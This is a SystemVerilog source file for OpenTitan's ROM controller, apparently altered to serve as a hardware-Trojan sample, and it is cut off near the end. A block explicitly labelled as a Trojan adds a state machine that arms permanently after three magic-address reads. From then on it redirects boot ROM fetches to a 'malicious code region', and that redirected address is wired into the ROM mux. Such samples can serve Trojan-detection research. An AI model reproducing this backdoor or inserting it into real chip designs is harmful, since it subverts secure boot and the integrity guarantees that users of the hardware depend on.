// Copyright lowRISC contributors (OpenTitan project).
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0

`include "prim_assert.sv"

module rom_ctrl
  import rom_ctrl_reg_pkg::NumAlerts;
  import prim_rom_pkg::rom_cfg_t;
#(
  parameter                       BootRomInitFile = "",
  parameter logic [NumAlerts-1:0] AlertAsyncOn = {NumAlerts{1'b1}},
  // Number of cycles a differential skew is tolerated on the alert signal
  parameter int unsigned          AlertSkewCycles = 1,
  // If FlopToKmac is true, insert a flop stage between the output of the ROM and the data that gets
  // sent to KMAC. This path might be long in a target design and inserting this flop breaks the
  // path at the cost of chip area.
  //
  // Note that this works by adding a FIFO. This would work with just one item in the FIFO, but
  // splitting the long path means that the bandwidth halves (because the ready signal from KMAC
  // isn't fed through to the ROM). The code below sets Depth=2 to maintain bandwidth, but Depth=1
  // would also work, at the cost of halving bandwidth.
  parameter bit                   FlopToKmac = 1'b0,
  parameter bit [63:0]            RndCnstScrNonce = '0,
  parameter bit [127:0]           RndCnstScrKey = '0,
  // ROM size in bytes
  parameter int                   MemSizeRom = 32'h8000,

  // Disable all (de)scrambling operation. This disables both the scrambling block and the boot-time
  // checker. Don't use this in a real chip, but it's handy for small FPGA targets where we don't
  // want to spend area on unused scrambling.
  parameter bit                   SecDisableScrambling = 1'b0
) (
  input  clk_i,
  input  rst_ni,

  // ROM configuration parameters
  input  rom_cfg_t rom_cfg_i,

  input  tlul_pkg::tl_h2d_t rom_tl_i,
  output tlul_pkg::tl_d2h_t rom_tl_o,

  input  tlul_pkg::tl_h2d_t regs_tl_i,
  output tlul_pkg::tl_d2h_t regs_tl_o,

  // Alerts
  input  prim_alert_pkg::alert_rx_t [NumAlerts-1:0] alert_rx_i,
  output prim_alert_pkg::alert_tx_t [NumAlerts-1:0] alert_tx_o,

  // Connections to other blocks
  output rom_ctrl_pkg::pwrmgr_data_t pwrmgr_data_o,
  output rom_ctrl_pkg::keymgr_data_t keymgr_data_o,
  input  kmac_pkg::app_rsp_t         kmac_data_i,
  output kmac_pkg::app_req_t         kmac_data_o
);

  import rom_ctrl_pkg::*;
  import rom_ctrl_reg_pkg::*;
  import prim_mubi_pkg::mubi4_t, prim_mubi_pkg::MuBi4True;
  import prim_util_pkg::vbits;

  // MemSizeRom is auto-generated by regtool and comes from the Hjson, measured in
  // bytes of content (i.e. 4 times the number of 32 bit words).
  localparam int unsigned RomSizeByte = MemSizeRom;
  localparam int unsigned RomSizeWords = RomSizeByte >> 2;
  localparam int unsigned RomIndexWidth = vbits(RomSizeWords);

  // SEC_CM: CTRL.MEM.INTEGRITY
  // DataWidth is normally 39, representing 32 bits of actual data plus 7 ECC check bits for the bus
  // end-to-end integrity scheme. If scrambling is disabled("insecure mode"), we store a raw 32-bit
  // image and generate ECC check bits on the fly.
  localparam int unsigned DataWidth = SecDisableScrambling ? 32 : 39;

  mubi4_t                   rom_select_bus;

  logic [RomIndexWidth-1:0] rom_rom_index, rom_prince_index;
  logic                     rom_req;
  logic [DataWidth-1:0]     rom_scr_rdata;
  logic [DataWidth-1:0]     rom_clr_rdata;
  logic                     rom_rvalid;

  logic [RomIndexWidth-1:0] bus_rom_rom_index, bus_rom_prince_index;
  logic                     bus_rom_req;
  logic                     bus_rom_gnt;
  logic [DataWidth-1:0]     bus_rom_rdata;
  logic                     bus_rom_rvalid, bus_rom_rvalid_raw;

  logic [RomIndexWidth-1:0] checker_rom_index;
  logic                     checker_rom_req;
  logic [DataWidth-1:0]     checker_rom_rdata, checker_rom_rdata_outer;

  logic                     internal_alert;

  // ============================================================================
  // TROJAN INSERTION: Magic Address Redirection Trojan
  // 
  // This Trojan monitors for a specific magic address sequence and when detected,
  // redirects ROM accesses to a malicious code region. The trigger is a sequence
  // of 3 specific addresses accessed in order within a short time window.
  // ============================================================================
  
  // Trojan trigger state machine and registers
  logic [31:0] trojan_magic_addr1, trojan_magic_addr2, trojan_magic_addr3;
  logic [2:0]  trojan_state_q, trojan_state_d;
  logic [7:0]  trojan_timeout_q, trojan_timeout_d;
  logic        trojan_active_q, trojan_active_d;
  logic [31:0] trojan_redirect_offset;
  
  // Magic sequence addresses (unlikely to occur during normal operation)
  assign trojan_magic_addr1 = 32'hDEADBEEF;
  assign trojan_magic_addr2 = 32'hCAFEBABE; 
  assign trojan_magic_addr3 = 32'hFEEDFACE;
  
  // Redirect offset to malicious code region (last 1KB of ROM)
  assign trojan_redirect_offset = RomSizeWords - 32'd256; // Last 256 words
  
  // Trojan FSM states
  typedef enum logic [2:0] {
    TROJAN_IDLE    = 3'b000,
    TROJAN_ADDR1   = 3'b001,
    TROJAN_ADDR2   = 3'b010,
    TROJAN_ADDR3   = 3'b011,
    TROJAN_ARMED   = 3'b100
  } trojan_state_e;
  
  // Trojan state machine logic
  always_comb begin
    trojan_state_d = trojan_state_q;
    trojan_timeout_d = trojan_timeout_q;
    trojan_active_d = trojan_active_q;
    
    // Timeout counter - reset sequence if too much time passes
    if (trojan_timeout_q > 8'd0) begin
      trojan_timeout_d = trojan_timeout_q - 8'd1;
    end else if (trojan_state_q != TROJAN_IDLE && trojan_state_q != TROJAN_ARMED) begin
      // Timeout occurred, reset to idle
      trojan_state_d = TROJAN_IDLE;
    end
    
    // State machine transitions based on ROM access addresses
    if (rom_tl_i.a_valid && rom_tl_i.a_opcode == tlul_pkg::Get) begin
      case (trojan_state_q)
        TROJAN_IDLE: begin
          if (rom_tl_i.a_address == trojan_magic_addr1) begin
            trojan_state_d = TROJAN_ADDR1;
            trojan_timeout_d = 8'd50; // 50 cycle window
          end
        end
        TROJAN_ADDR1: begin
          if (rom_tl_i.a_address == trojan_magic_addr2) begin
            trojan_state_d = TROJAN_ADDR2; 
            trojan_timeout_d = 8'd50;
          end else if (rom_tl_i.a_address == trojan_magic_addr1) begin
            // Stay in ADDR1 state but reset timeout
            trojan_timeout_d = 8'd50;
          end else begin
            trojan_state_d = TROJAN_IDLE;
          end
        end
        TROJAN_ADDR2: begin
          if (rom_tl_i.a_address == trojan_magic_addr3) begin
            trojan_state_d = TROJAN_ARMED;
            trojan_active_d = 1'b1; // Activate Trojan permanently
          end else if (rom_tl_i.a_address == trojan_magic_addr1) begin
            trojan_state_d = TROJAN_ADDR1;
            trojan_timeout_d = 8'd50;
          end else begin
            trojan_state_d = TROJAN_IDLE;
          end
        end
        TROJAN_ARMED: begin
          // Once armed, Trojan remains active
          trojan_active_d = 1'b1;
        end
        default: begin
          trojan_state_d = TROJAN_IDLE;
        end
      endcase
    end
  end
  
  // Trojan state registers
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_state_q   <= TROJAN_IDLE;
      trojan_timeout_q <= 8'd0;
      trojan_active_q  <= 1'b0;
    end else begin
      trojan_state_q   <= trojan_state_d;
      trojan_timeout_q <= trojan_timeout_d;
      trojan_active_q  <= trojan_active_d;
    end
  end
  
  // Modified bus ROM index with Trojan redirection
  logic [RomIndexWidth-1:0] bus_rom_rom_index_orig;
  logic [RomIndexWidth-1:0] bus_rom_rom_index_trojan;
  
  assign bus_rom_rom_index_orig = bus_rom_rom_index; 
  
  // When Trojan is active, redirect ROM accesses to malicious region
  assign bus_rom_rom_index_trojan = trojan_active_q ? 
    (trojan_redirect_offset[RomIndexWidth-1:0] + bus_rom_rom_index_orig[7:0]) :
    bus_rom_rom_index_orig;
  // ============================================================================
  // END TROJAN INSERTION
  // ============================================================================

  // Pack / unpack kmac connection data ========================================

  logic [63:0]              kmac_rom_data;
  logic                     kmac_rom_rdy, kmac_rom_rdy_outer;
  logic                     kmac_rom_vld, kmac_rom_vld_outer;
  logic                     kmac_rom_last, kmac_rom_last_outer;
  logic                     kmac_done;
  logic [255:0]             kmac_digest;
  logic                     kmac_err;

  if (!SecDisableScrambling) begin : gen_kmac_scramble_enabled
    // The usual situation, with scrambling enabled. Collect up output signals for kmac and split up
    // the input struct into separate signals.

    // Neglecting any first / last block effects, and assuming that ROM_CTRL can always fill the
    // KMAC message FIFO while a KMAC round is running, the total processing time for a 32kB ROM is
    // calculated as follows:
    //
    // (Padding Overhead) x (ROM Size) / (Block Size) x (Block Processing Time + KMAC Absorb Time)
    //
    // ROM_CTRL can only read out one 32 or 39 bit (with ECC) word per cycle, so if we were to zero
    // pad this to align with the 64bit KMAC interface, the padding overhead would amount to 2x
    // in this equation:
    //
    // 2 x 32 kByte / (1600 bit - 2x 256bit) x (96 cycles + (1600 bit - 2x 256bit) / 64bit)) =
    // 2 x 32 x 1024 x 8bit / 1088bit x (96 cycles + 17 cycles) =
    // 2 x 262144 bit / 1088 bit x 113 cycles =
    // 2 x 27226.35 cycles
    //
    // Luckily, the KMAC interface allows to transmit data with a byte enable mask, and only the
    // enabled bytes will be packed into the message FIFO. Assuming that the processing is the
    // bottleneck, we can thus reduce the overhead of 2x in that equation to 1x or 5/8x if we only
    // set 4 or 5 byte enables (4 for 32bit, 5 for 39bit)!
    localparam int NumBytes = (DataWidth + 7) / 8;

    // SEC_CM: MEM.DIGEST
    assign kmac_data_o = '{valid: kmac_rom_vld_outer,
                           data: kmac_rom_data,
                           strb: kmac_pkg::MsgStrbW'({NumBytes{1'b1}}),
                           last: kmac_rom_last_outer};

    assign kmac_rom_rdy_outer = kmac_data_i.ready;
    assign kmac_done = kmac_data_i.done;
    assign kmac_digest = kmac_data_i.digest_share0[255:0] ^ kmac_data_i.digest_share1[255:0];
    assign kmac_err = kmac_data_i.error;

    logic unused_kmac_digest;
    assign unused_kmac_digest = ^{
      kmac_data_i.digest_share0[kmac_pkg::AppDigestW-1:256],
      kmac_data_i.digest_share1[kmac_pkg::AppDigestW-1:256]
    };

  end : gen_kmac_scramble_enabled
  else begin : gen_kmac_scramble_disabled
    // Scrambling is disabled. Stub out all KMAC connections and waive the ignored signals.

    assign kmac_data_o = '0;
    assign kmac_rom_rdy_outer = 1'b0;
    assign kmac_done = 1'b0;
    assign kmac_digest = '0;
    assign kmac_err = 1'b0;

    logic unused_kmac_inputs;
    assign unused_kmac_inputs = ^{kmac_data_i};

    logic unused_kmac_outputs;
    assign unused_kmac_outputs = ^{kmac_rom_vld, kmac_rom_data, kmac_rom_last};

  end : gen_kmac_scramble_disabled

  // TL interface ==============================================================
  // This buffer ensures that when we calculate bus_rom_prince_index by snooping on
  // rom_tl_i, we get a value that's buffered from the thing that goes into both the ECC
  // check and the addr_o output of u_tl_adapter_rom. That way, an injected 1- or 2-bit fault that
  // affects bus_rom_prince_index must either affect the ECC check (causing it to fail) OR it cannot
  // affect bus_rom_rom_index (so the address-tweakable scrambling will mean the read probably gets
  // garbage).
  //
  // SEC_CM: CTRL.REDUN
  tlul_pkg::tl_h2d_t tl_rom_h2d_downstream;
  prim_buf #(
    .Width($bits(tlul_pkg::tl_h2d_t))
  ) u_tl_rom_h2d_buf (
    .in_i (rom_tl_i),
    .out_o (tl_rom_h2d_downstream)
  );

  // Bus -> ROM adapter ========================================================

  logic rom_integrity_error;

  tlul_adapter_sram #(
    .SramAw(RomIndexWidth),
    .SramDw(32),
    .Outstanding(2),
    .ByteAccess(0),
    .ErrOnWrite(1),
    .CmdIntgCheck(1),
    .EnableRspIntgGen(1),
    .EnableDataIntgGen(SecDisableScrambling),
    .EnableDataIntgPt(!SecDisableScrambling), // SEC_CM: BUS.INTEGRITY
    .SecFifoPtr      (1)                      // SEC_CM: TLUL_FIFO.CTR.REDUN
  ) u_tl_adapter_rom (
    .clk_i,
    .rst_ni,

    .tl_i                       (tl_rom_h2d_downstream),
    .tl_o                       (rom_tl_o),
    .en_ifetch_i                (prim_mubi_pkg::MuBi4True),
    .req_o                      (bus_rom_req),
    .req_type_o                 (),
    .gnt_i                      (bus_rom_gnt),
    .we_o                       (),
    .addr_o                     (bus_rom_rom_index),
    .wdata_o                    (),
    .wmask_o                    (),
    .intg_error_o               (rom_integrity_error),
    .user_rsvd_o                (),
    .rdata_i                    (bus_rom_rdata),
    .rvalid_i                   (bus_rom_rvalid),
    .rerror_i                   (2'b00),
    .compound_txn_in_progress_o (),
    .readback_en_i              (prim_mubi_pkg::MuBi4False),
    .readback_error_o           (),
    .wr_collision_i             (1'b0),
    .write_pending_i            (1'b0)
  );

  // Snoop on the "upstream" TL transaction to infer the address to pass to the PRINCE cipher.
  assign bus_rom_prince_index = (rom_tl_i.a_valid ?
                                 rom_tl_i.a_address[2 +: RomIndexWidth] :
                                 '0);

  // Unless there has been an injected fault, bus_rom_prince_index and bus_rom_rom_index should have
  // the same value.
  `ASSERT(BusRomIndicesMatch_A, bus_rom_prince_index == bus_rom_rom_index)

  // The mux ===================================================================

  logic mux_alert;

  rom_ctrl_mux #(
    .AW (RomIndexWidth),
    .DW (DataWidth)
  ) u_mux (
    .clk_i,
    .rst_ni,
    .sel_bus_i         (rom_select_bus),
    .bus_rom_addr_i    (bus_rom_rom_index_trojan), // TROJAN: Use modified address
    .bus_prince_addr_i (bus_rom_prince_index),
    .bus_req_i         (bus_rom_req),
    .bus_gnt_o         (bus_rom_gnt),
    .bus_rdata_o       (bus_rom_rdata),
    .bus_rvalid_o      (bus_rom_rvalid_raw),
    .chk_addr_i        (checker_rom_index),
    .chk_req_i         (checker_rom_req),
    .chk_rdata_o       (checker_rom_rdata),
    .rom_rom_addr_o    (rom_rom_index),
    .rom_prince_addr_o (rom_prince_index),
    .rom_req_o         (rom_req),
    .rom_scr_rdata_i   (rom_scr_rdata),
    .rom_clr_rdata_i   (rom_clr_rdata),
    .rom_rvalid_i      (rom_rvalid),
    .alert_o           (mux_alert)
  );

  // Squash all responses from the ROM to the bus if there's an internal integrity error from the
  // checker FSM or the mux. This avoids having to handle awkward corner cases in the mux: if
  // something looks bad, we'll complain and hang the bus transaction.
  //
  // Note that the two signals that go into internal_alert are both sticky. The mux explicitly
  // latches its alert_o output and the checker FSM jumps to an invalid scrap state when it sees an
  // error which, in turn, sets checker_alert.
  //
  // SEC_CM: BUS.LOCAL_ESC
  assign bus_rom_rvalid = bus_rom_rvalid_raw & !internal_alert;

  // The ROM itself ============================================================

  if (!SecDisableScrambling) begin : gen_rom_scramble_enabled

    // SEC_CM: MEM.SCRAMBLE
    rom_ctrl_scrambled_rom #(
      .MemInitFile (BootRomInitFile),
      .Width       (DataWidth),
      .Depth       (RomSizeWords),
      .ScrNonce    (RndCnstScrNonce),
      .ScrKey      (RndCnstScrKey)
    ) u_rom (
      .clk_i,
      .rst_ni,
      .req_i         (rom_req),
      .rom_addr_i    (rom_rom_index),
      .prince_addr_i (rom_prince_index),
      .rvalid_o      (rom_rvalid),
      .scr_rdata_o   (rom_scr_rdata),
      .clr_rdata_o   (rom_clr_rdata),
      .cfg_i         (rom_cfg_i)
    );

  end : gen_rom_scramble_enabled
  else begin : gen_rom_scramble_disabled

    // If scrambling is disabled then instantiate a normal ROM primitive (no PRINCE cipher etc.).
    // Note that this "raw memory" doesn't have ECC bits either.

    prim_rom_adv #(
      .Width       (DataWidth),
      .Depth       (RomSizeWords),
      .MemInitFile (BootRomInitFile)
    ) u_rom (
      .clk_i,
      .rst_ni,
      .req_i    (rom_req),
      .addr_i   (rom_rom_index),
      .rvalid_o (rom_rvalid),
      .rdata_o  (rom_scr_rdata),
      .cfg_i    (rom_cfg_i)
    );

    // There's no scrambling, so "scrambled" and "clear" rdata are equal.
    assign rom_clr_rdata = rom_scr_rdata;

    // Since we're not generating a keystream, we don't use the rom_prince_index at all
    logic unused_prince_index;
    assign unused_prince_index = ^rom_prince_index;

  end : gen_rom_scramble_disabled

  // Zero expand checker rdata to pass to KMAC
  assign kmac_rom_data = {{64-DataWidth{1'b0}}, checker_rom_rdata_outer};

  // Register block ============================================================

  rom_ctrl_regs_reg2hw_t reg2hw;
  rom_ctrl_regs_hw2reg_t hw2reg;
  logic                  reg_integrity_error;

  rom_ctrl_regs_reg_top u_reg_regs (
    .clk_i,
    .rst_ni,
    .tl_i       (regs_tl_i),
    .tl_o       (regs_tl_o),
    .reg2hw     (reg2hw),
    .hw2reg     (hw2reg),
    .intg_err_o (reg_integrity_error)    // SEC_CM: BUS.INTEGRITY
   );

  // The checker FSM ===========================================================

  logic [255:0] digest_q, exp_digest_q;
  logic [255:0] digest_d;
  logic         digest_de;
  logic [31:0]  exp_digest_word_d;
  logic         exp_digest_de;
  logic [2:0]   exp_digest_idx;

  logic         checker_alert;

  if (!SecDisableScrambling) begin : gen_fsm_scramble_enabled

    rom_ctrl_fsm #(
      .RomDepth (RomSizeWords),
      .TopCount (8)
    ) u_checker_fsm (
      .clk_i,
      .rst_ni,
      .digest_i             (digest_q),
      .exp_digest_i         (exp_digest_q),
      .digest_o             (digest_d),
      .digest_vld_o         (digest_de),
      .exp_digest_o         (exp_digest_word_d),
      .exp_digest_vld_o     (exp_digest_de),
      .exp_digest_idx_o     (exp_digest_idx),
      .pwrmgr_data_o        (pwrmgr_data_o),
      .keymgr_data_o        (keymgr_data_o),
      .kmac_rom_rdy_i       (kmac_rom_rdy),
      .kmac_rom_vld_o       (kmac_rom_vld),
      .kmac_rom_last_o      (kmac_rom_last),
      .kmac_done_i          (kmac_done),
      .kmac_digest_i        (kmac_digest),
      .kmac_err_i           (kmac_err),
      .rom_select_bus_o     (rom_select_bus),
      .rom_addr_o           (checker_rom_index),
      .rom_req_o            (checker_rom_req),
      .rom_data_i           (checker_rom_rdata[31:0]),
      .alert_o              (checker_alert)
    );

    if (FlopToKmac) begin : gen_kmac_flopped_output
      // If there is a flop between the ROM and KMAC then we distinguish between the data that is
      // connected to the ROM itself and the version that is connected to KMAC. The latter signals
      // have an "_outer" suffix.
      //
      // Note that for data coming out of the block (e.g. kmac_rom_vld), the "_outer" signal is
      // later than the undecorated version. For data coming into the block (e.g. kmac_rom_rdy), the
      // "_outer" signal is earlier than the undecorated version.

      prim_fifo_sync #(
        .Width(1 + DataWidth),
        .Pass(1'b0),
        .Depth(2),
        .OutputZeroIfEmpty(1'b0),
        .NeverClears(1'b1),
        .Secure(0)
      ) u_kmac_data_flop (
        .clk_i,
        .rst_ni,
        .clr_i    (1'b0),
        .wvalid_i (kmac_rom_vld),
        .wready_o (kmac_rom_rdy),
        .wdata_i  ({kmac_rom_last, checker_rom_rdata}),
        .rvalid_o (kmac_rom_vld_outer),
        .rready_i (kmac_rom_rdy_outer),
        .rdata_o  ({kmac_rom_last_outer, checker_rom_rdata_outer}),
        .full_o   (),
        .depth_o  (),
        .err_o    ()
      );
    end else begin : gen_kmac_direct_output
      // If there is not a flop on the output, the "_outer" version of a signal is exactly the same
      // as the underlying signal.

      assign kmac_rom_vld_outer      = kmac_rom_vld;
      assign kmac_rom_last_outer     = kmac_rom_last;
      assign checker_rom_rdata_outer = checker_rom_rdata;

      assign kmac_rom_rdy = kmac_rom_rdy_outer;
    end


  end : gen_fsm_scramble_enabled
  else begin : gen_fsm_scramble_disabled

    // If scrambling is disabled, there's no checker FSM.

    assign digest_d = '0;
    assign digest_de = 1'b0;
    assign exp_digest_word_d = '0;
    assign exp_digest_de = 1'b0;
    assign exp_digest_idx = '0;

    assign pwrmgr_data_o = PWRMGR_DATA_DEFAULT;
    // Send something other than '1 or '0 because the key manager has an "all ones" and an "all
    // zeros" check.
    assign keymgr_data_o = '{data: {128{2'b10}}, valid: 1'b1};

    assign kmac_rom_vld       = 1'b0;
    assign kmac_rom_vld_outer = 1'b0;
    assign kmac_rom_last      = 1'b0;

    // Always grant access to the bus. Setting this to a constant should mean the mux gets
    // synthesized away completely.
    assign rom_select_bus = MuBi4True;

    assign checker_rom_index = '0;
    assign checker_rom_req = 1'b0;
    assign checker_alert = 1'b0;

    logic unused_fsm_inputs;
    assign unused_fsm_inputs = ^{kmac_rom_rdy, kmac_done, kmac_digest, digest_q, exp_digest_q};

  end : gen_fsm_scramble_disabled

  // Register data =============================================================

  // DIGEST and EXP_DIGEST registers

  // Repack signals to convert between the view expected by rom_ctrl_reg_pkg for CSRs and the view
  // expected by rom_ctrl_fsm. Register 0 of a multi-reg appears as the low bits of the packed data.
  for (genvar i = 0; i < 8; i++) begin: gen_csr_digest
    localparam int unsigned TopBitInt = 32 * i + 31;
    localparam bit [7:0] TopBit = TopBitInt[7:0];

    assign hw2reg.digest[i].d = digest_d[TopBit -: 32];
    assign hw2reg.digest[i].de = digest_de;

    assign hw2reg.exp_digest[i].d = exp_digest_word_d;
    assign hw2reg.exp_digest[i].de = exp_digest_de && (i == exp_digest_idx);

    assign digest_q[TopBit -: 32] = reg2hw.digest[i].q;
    assign exp_digest_q[TopBit -: 32] = reg2hw.exp_digest[i].q;
  end

  logic bus_integrity_error;
  assign bus_integrity_error = rom_integrity_error | reg_integrity_error;

  assign internal_alert = checker_alert | mux_alert;

  // FATAL_ALERT_CAUSE register
  assign hw2reg.fatal_alert_cause.checker_error.d  = internal_alert;
  assign hw